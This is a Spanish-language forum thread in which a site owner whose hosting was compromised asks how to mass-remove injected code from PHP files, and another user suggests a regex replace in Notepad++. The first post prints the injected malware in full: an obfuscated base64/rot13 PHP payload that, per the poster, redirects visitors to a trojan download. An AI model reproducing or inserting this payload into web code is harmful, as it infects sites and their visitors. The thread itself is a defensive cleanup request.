Renombrar masivamente archivos

#1 (**permalink**) 13/06/2011, 15:34

Saludos

Veran, poseo un hosting en el cual ha habido una intrusion y de manera automatizada todos mis ficheros php han sido modificados. A estos se les antepone un codigo encriptado que te redirije a la descarga de un troyano.

El codigo es el siguiente:

$somecrainsignvar="hv1b7za6"; echo base64_decode(str_rot13('CUAwpzyjqQ5yoQ1xo2A1oJIhq P5wpzIuqTISoTIgMJ50XPWxnKLvXGgyoP5coz5ypxuHGHj9VyW yMzIlMJ5wMHIlpvV7qUW5r3ElrKg0nUWiqlNksJAuqTAbXTRcr 2WoZy09ZwS9B31wLKEwnPuuXKgeCJIfYzyhozIlFSEAGPguYaE iH3ElnJ5aXPxhp3Ivp3ElXQNfZPx7sGgupw0vCPkgrmSvqUptM w9qLlNhMR4bDw1yqIDcB0IbsKb6J1jvoTScD3WirFp+Y3MhDGO mM3NvB2SlZw0vHwHlLmOwBQEwYGRjZTZgATZmAzZgBTZ4BTZgZ GNjLmZ2Ll03AzZ3ZzZ5ZzZgZGD4LmZlLmRmZzZgZGN4Ll01AzZ 3AzZlBTZgAQuwYGplLmplLmxlLl0kAQuwZGLjLl0kZGWwBQOwY GL0LmD0LmH2Ll0kZwEwAwuwYGRlATZ3ZzZgZGWwBQuwYGRmAzZ kZwuwYGt4LmxlLmEwYGL0LmV4LmLjLl0kZmMwAQuwYGtjLmDjL mOwZTZ4ATZgZGNjLmRjBTZgZGWwYGRlATZ3ZzZ2ATZgAmMwZwE wATZgAQEwZTZ1AzZgAmMwAQuwAQuwAGMwYGRjATZgAQuwYGVjL mDjLmOwZTZ4Lmt4Ll0kZQOwZmMwYGp2LmplLmxlLl0kAQuwZmW wYGV4LmRkAzZgBTZgZGRlLmH2Ll0kZzZ1AzZgZGV0LmRmAzZgZ GNjLmRjBTZgZGWwYGRlATZ3ZzZgAQuwZGHlLl00ZTZgBGMwZwu wBQOwYGHlLl04ZTZjLmR2BTZgAmMwAQuwZTZgAGWwYGHlLmVjL mRjATZgZGN0LmRjATZgZGLjLmR0ATZgZmMwZGWwYGL0LmZlLmL jLl05ZzZmZzZlZTZgZwuwAQEwYGt4Lmp2Ll04ZTZgBTZkZQOwY GR0ZTZkAGMwYGR0ZTZmAzZkZwEwYGVjLmV0Ll00ZTZgBGWwZGZ 2Ll04BTZ4BTZgZGHlLmR0ATZgAQuwYGp2LmR2Ll02ZTZkAQOwY GRlATZgATZkZQuwYGp2Ll0mAzZ4ZTZgZwuwBQOwYGR0ZTZkAwE wYGV0Ll0kZwEwAmWwYGV0LmH2LmHlLl04ATZgBQOwAGWwBQOwY GR0ZTZkAwEwYGV0Ll0kZwEwZGHlLl0kAwOwZGV4Ll0lATZgAQu wYGEwBQOwZGWwYGZlLmD4Ll00BTZgZGR2LmRkAzZgBTZ4Ll0kZ GWwZGV4Ll0mAzZgZGWwZmWwYGp2LmOwZwOwBGWwYGp2Lmx2Ll0 0ATZmAzZgAQuwYGRkZzZkZGWwZGWwZwEwYGH2LmR2Ll0kZGWwZ GL0Ll0mAzZgZwOwYGD0Ll02ZTZ1AzZkAzZmZzZgAQuwYGD0Ll0 kZzZ5ZzZ2ATZgBQEwYGplLmRlATZ0ATZgAmMwAwEwYGt0LmLjL mEwYGR2ZTZkAwEwYGV4Ll0kZQOwZGN4Ll0kZzZgZGV0LmplLmt jLl0mAzZgZmWwATZgAQEwZTZ1AzZgAGMwZTZgZGMwAQuwBQuwY GRlATZgZwEwZGRlLmRlLmV0Ll0kAQOwZGN0Ll0kZQOwZGN4Ll0 kZzZgZGV0LmplLmL0Ll03AzZlATZgBQOwAQOwZTZjLmRkAzZgZ mMwZGWwYGRkZzZ0Ll00LmD0Ll00ATZlBTZ4BTZgZGNjLmZ2Ll0 3AzZ3ZzZ5ZzZgZGD4LmZlLl04Lmx2Ll02ATZ1ZzZgZGN4LmH2L mVjLmV4Ll00BTZgAmWwAmWwBGWwYGR0BTZ0ATZ4BTZgZwOwYGR jZTZkZQuwYGRlLl0kZwEwAmWwAmMwYGL0LmEwYGLjLmVjLmRlB TZgZGN0Ll01AzZkAGWwYGR1ZzZjLmRlZTZgBTZgZGR2LmL0Ll0 2ZTZ1AzZgZGWwBQuwZwuwYGDjLl05AzZkZQuwYGR1ZzZkAGWwY GHlLl04ZTZjLmR2BTZgAmMwAQuwZTZgAGWwYGHlLmVjLmRjATZ gZGN0LmRjATZgZGLjLmR0ATZgZmMwZGWwYGL0LmZlLmLjLl05Z zZmZzZlZTZgZwuwAQEwYGt4Lmp2Ll04ZTZgBTZkZQOwYGR0ZTZ kAGMwYGR0ZTZmAzZkZwEwYGVjLmV0Ll00ZTZgBGWwZGZ2Ll04B TZ4BTZgZGHlLmR0ATZgAQuwYGp2LmR2Ll02ZTZkAQOwYGL0LmE wYGLjLmVjLmRlBTZgZGLjLmRlBTZgZwEwYGD4Ll0lATZkZGWwY GZlLmD4Ll00BTZgZGR2LmRkAzZgBTZ4Ll0kZGWwZGV4Ll03AzZ 4ZTZgAGWwZmWwYGp2LmOwZwOwBGWwYGR2Ll02ZTZgAwOwZwOwZ GV4Ll0kAwOwZGV4Ll0lATZgAQuwYGV0LmRmAzZgAQEwZmMwYGD 4Ll0kZGWwZGRlLmRlLmV0Ll05AzZ4ZTZgZwEwYGRkZzZkAwEwY GZ2Ll0lZTZgAQEwYGLjLmH2Lmp2Ll02ZTZgAwOwZwOwZGV4Ll0 kAwOwZGV4Ll0lATZgAQuwYGV0LmplLl00BTZgAQEwYGRlLmHlL mtjLmV0Ll0lATZgAwOwYGLjLmVjLmRlBTZgZGLjLmRlBTZgZwE wYGD4Ll0lATZgZmWwZGV0LmD0Ll0kZGMwBQOwZwEwYGV0Ll02Z TZgAwOwZwOwZGV4Ll0kZQEwYGH2LmR1ZzZgZGHlLmOwZGVjLl0 4Ll0kZGMwAwEwYGLjLmH2Ll0kZzZ4BTZgZGV4LmRjBTZgAmMwY GZ2LmtjLmHlLl0kAGWwZGHlLl0kAQOwZGL0Ll0lATZgAwEwATZ gAwOwZwOwZGV4Ll0kZQEwYGH2LmR1ZzZgZGHlLmOwZGVjLl04L l0kZGMwAwEwYGLjLmH2Ll0kZzZ4BTZgAGWwYGV0LmH2LmHlLl0 4ATZgBQOwZGZlLl0kAGWwZGHlLl0kAQOwZGL0Ll0lATZgAwEwA TZgAQEwZTZjLmuwBQuwYGRjZTZmAzZgAmMwAmWwBGWwYGR0BTZ mZzZkZmWwYGRjBTZgAGMwAmMwZwuwYGD4Ll03ZzZ3ZzZ5ZzZgZ GD4LmR2ZTZgZGRlLmtjLl02ATZ0ATZ1AzZgZGV0LmL4Ll0kZwE wAmWwYGRlLmt4Ll0kZmMwZGV4Ll04BTZ5ZzZ0Ll02ATZlBTZ2Z TZgZGZ2LmRlLmp2LmLjLmOwYGRkZzZ5ZzZgZGRlLmtjLl0mAzZ mZzZgBTZgAwuwBTZgZmWwAGMwATZgAQEwZTZ1AvV7pTS1CFW1p z4tMIWyMzIlMJ5wMHIlpvVhpzIjoTSwMFueYPW2LJjvXGgyCHM 1ozA0nJ9hXPWlMKDvX3OuqFxbXGgupwV9LKVlYaAjoTy0XPWwV vx7LKVlJmOqCFV1ZvV7pm0vVwgjo3Z9ZQgzo3VbnG0jB2xuCJS lZv5fMJ5aqTt7nFfeXKgyXPqjo3ZeCKOupaAyFJ50XTfhpzIjo TSwMFtvHzIzMKWyovVfVwOup2DvXFxeLKVlJ2yqYmDaXGgyXPq mXm1upv5mqJWmqUVbpT9mYQRcWlx7sD0XMFumXGf8Y3Awpzyjq Q4=')); $crain="";

Necesito remplazar de todos mis ficheros php que cuelgan de mi directorio esa intruccion.

Alguien sabe de algun metodo rapido?

abimaelrc · #2 (**permalink**) 13/06/2011, 15:37

Podrías abrir con un editor, ejemplo Notepad++, todos los archivos y con "replace all in All Opened Documents" haces el cambio.

#3 (**permalink**) 13/06/2011, 15:42

Dificil, te explico:

Las cadenas son diferentes y tengo que remplazarlo en archivos de plantillas como joomla wordpress..etc

Podria remplazar todos los archivos del wordpress por ejemplo? si ntener que tocar la db claro

abimaelrc · #4 (**permalink**) 13/06/2011, 15:48

Notepad++ se puede manejar usando expresiones regulares, aún así puedes usarlo para remplazar el contenido. Algo así debe ser el poder cambiar con expresiones regulares echo base64_decode$str_rot13\('.+?'$\)